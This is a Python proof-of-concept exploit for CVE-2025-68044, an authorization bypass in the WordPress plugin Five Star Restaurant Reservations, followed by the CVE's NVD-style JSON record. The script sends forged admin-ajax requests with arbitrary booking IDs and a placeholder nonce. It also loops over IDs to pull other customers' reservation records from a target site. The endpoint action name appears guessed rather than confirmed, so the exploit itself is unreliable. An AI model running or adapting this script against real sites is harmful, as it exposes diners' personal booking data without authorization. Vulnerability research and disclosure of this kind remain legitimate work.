CVE-2025-68044

import requests import sys # CVE-2025-68044 PoC - Authorization Bypass in Five Star Restaurant Reservations # Target: WordPress site with Five Star Restaurant Reservations plugin <= 2.7.4 def exploit_auth_bypass(target_url, booking_id): """ Exploit for Authorization Bypass Through User-Controlled Key vulnerability This PoC demonstrates accessing unauthorized booking records by manipulating booking IDs """ # Target endpoint for viewing booking details endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Malicious request to access unauthorized booking # Attacker controls the booking_id parameter to bypass authorization data = { 'action': 'restaurant_reservations_view_booking', 'booking_id': booking_id, # User-controlled key - no proper authorization check 'security': '任意值' # In some cases, nonce validation is missing } try: response = requests.post(endpoint, data=data, timeout=10) if response.status_code == 200: # Check if booking data is returned without proper authorization if 'booking' in response.text.lower() or 'reservation' in response.text.lower(): print(f"[!] Authorization Bypass Confirmed!") print(f"[+] Accessed booking ID: {booking_id}") print(f"[+] Response: {response.text[:500]}") return True return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def enumerate_bookings(target_url, start_id=1, end_id=100): """ Enumerate booking IDs to demonstrate unauthorized access to multiple records """ print(f"[*] Enumerating booking IDs from {start_id} to {end_id}...") for booking_id in range(start_id, end_id + 1): if exploit_auth_bypass(target_url, booking_id): print(f"[+] Successfully accessed booking ID: {booking_id}") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-68044.py <target_url> <booking_id>") print("Example: python cve-2025-68044.py https://example.com 123") sys.exit(1) target = sys.argv[1] bid = sys.argv[2] exploit_auth_bypass(target, bid)

{"cve": {"id": "CVE-2025-68044", "sourceIdentifier": "[email protected]", "published": "2026-01-05T11:17:41.827", "lastModified": "2026-04-23T15:35:52.250", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Rustaurius Five Star Restaurant Reservations restaurant-reservations allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Five Star Restaurant Reservations: from n/a through <= 2.7.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/restaurant-reservations/vulnerability/wordpress-five-star-restaurant-reservations-plugin-2-7-7-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}